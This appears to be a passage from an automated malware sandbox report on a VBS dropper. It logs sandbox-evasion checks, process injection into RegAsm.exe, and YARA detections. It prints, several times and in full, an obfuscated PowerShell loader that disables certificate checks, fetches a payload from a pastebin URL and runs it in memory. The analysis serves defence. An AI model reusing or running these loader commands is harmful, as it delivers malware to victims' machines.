                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep count: 4912 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7312Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: powershell.exe, 00000004.00000002.2270288914.000002877C800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
                Source: powershell.exe, 0000000E.00000002.2594095090.00000272EE8D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                Source: powershell.exe, 0000000E.00000002.2596848048.00000272EEA40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                Source: RegAsm.exe, 00000007.00000002.3345509657.000000000166B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_6400.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_7096.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5368, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                .NET source code references suspicious native API functions
                Source: 4.2.powershell.exe.2877ca60000.5.raw.unpack, PoliTzzxo.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
                Source: 4.2.powershell.exe.2877ca60000.5.raw.unpack, PoliTzzxo.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
                Source: 4.2.powershell.exe.2877ca60000.5.raw.unpack, PoliTzzxo.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
                Injects a PE file into a foreign processes
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 414000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 416000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10AA008Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 414000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 416000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B95008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbsJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $lopuennntes = 'j?bh?g0?cwbo?gu?i??9?c??jw?w?dm?jw?7?cq?dgb2?gu?cgby?c??pq?g?cc?jqbw?ho?qqbj?e8?zwbj?g4?tqby?cu?jw?7?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqby?hy?aqbj?gu?u?bv?gk?bgb0?e0?yqbu?ge?zwbl?hi?xq?6?do?uwbl?hi?dgbl?hi?qwbl?hi?d?bp?gy?aqbj?ge?d?bl?fy?yqbs?gk?z?bh?hq?aqbv?g4?qwbh?gw?b?bi?ge?ywbr?c??pq?g?hs?j?b0?hi?dqbl?h0?owbb?fm?eqbz?hq?zqbt?c4?tgbl?hq?lgbt?gu?cgb2?gk?ywbl?f??bwbp?g4?d?bn?ge?bgbh?gc?zqby?f0?og?6?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?i??9?c??wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?gm?dqby?gk?d?b5?f??cgbv?hq?bwbj?g8?b?bu?hk?c?bl?f0?og?6?fq?b?bz?de?mg?7?fs?qgb5?hq?zqbb?f0?xq?g?cq?a?b6?gy?ygbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?tgbl?hc?lqbp?gi?agbl?gm?d??g?e4?zqb0?c4?vwbl?gi?qwbs?gk?zqbu?hq?kq?u?eq?bwb3?g4?b?bv?ge?z?bt?hq?cgbp?g4?zw?o?c??k?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??tgbl?hq?lgbx?gu?ygbd?gw?aqbl?g4?d??p?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?jwbo?hq?d?bw?do?lw?v?h??yqbz?hq?zqbi?gk?bg?u?gm?bwbt?c8?cgbh?hc?lwbw?dk?eq?1?fe?nqb2?hy?jw?p?c??kq?g?ck?owbb?hm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?gg?egbm?gi?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?cc?yg?3?fm?sgbi?dc?r?bj?c8?dwbh?hi?lwbt?g8?yw?u?g4?aqbi?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?hy?dgbl?hi?cg?g?cw?i??n?f8?xwbf?hc?aqbu?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?ge?bqbz?gg?zq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $lopuennntes.replace('?','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'c:\users\user\desktop\sostener.vbs';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;[byte[]] $hzfbs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring( (new-object net.webclient).downloadstring('http://pastebin.com/raw/v9y5q5vv') ) );[system.appdomain]::currentdomain.load($hzfbs).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('b7sjb7dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $lopuennntes = 'j?bh?g0?cwbo?gu?i??9?c??jw?w?dm?jw?7?cq?dgb2?gu?cgby?c??pq?g?cc?jqbw?ho?qqbj?e8?zwbj?g4?tqby?cu?jw?7?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqby?hy?aqbj?gu?u?bv?gk?bgb0?e0?yqbu?ge?zwbl?hi?xq?6?do?uwbl?hi?dgbl?hi?qwbl?hi?d?bp?gy?aqbj?ge?d?bl?fy?yqbs?gk?z?bh?hq?aqbv?g4?qwbh?gw?b?bi?ge?ywbr?c??pq?g?hs?j?b0?hi?dqbl?h0?owbb?fm?eqbz?hq?zqbt?c4?tgbl?hq?lgbt?gu?cgb2?gk?ywbl?f??bwbp?g4?d?bn?ge?bgbh?gc?zqby?f0?og?6?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?i??9?c??wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?gm?dqby?gk?d?b5?f??cgbv?hq?bwbj?g8?b?bu?hk?c?bl?f0?og?6?fq?b?bz?de?mg?7?fs?qgb5?hq?zqbb?f0?xq?g?cq?a?b6?gy?ygbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?tgbl?hc?lqbp?gi?agbl?gm?d??g?e4?zqb0?c4?vwbl?gi?qwbs?gk?zqbu?hq?kq?u?eq?bwb3?g4?b?bv?ge?z?bt?hq?cgbp?g4?zw?o?c??k?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??tgbl?hq?lgbx?gu?ygbd?gw?aqbl?g4?d??p?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?jwbo?hq?d?bw?do?lw?v?h??yqbz?hq?zqbi?gk?bg?u?gm?bwbt?c8?cgbh?hc?lwbw?dk?eq?1?fe?nqb2?hy?jw?p?c??kq?g?ck?owbb?hm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?gg?egbm?gi?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?cc?yg?3?fm?sgbi?dc?r?bj?c8?dwbh?hi?lwbt?g8?yw?u?g4?aqbi?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?hy?dgbl?hi?cg?g?cw?i??n?f8?xwbf?hc?aqbu?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?ge?bqbz?gg?zq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $lopuennntes.replace('?','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'c:\users\user\appdata\local\temp\sostener.vbs';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;[byte[]] $hzfbs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring( (new-object net.webclient).downloadstring('http://pastebin.com/raw/v9y5q5vv') ) );[system.appdomain]::currentdomain.load($hzfbs).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('b7sjb7dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $lopuennntes = 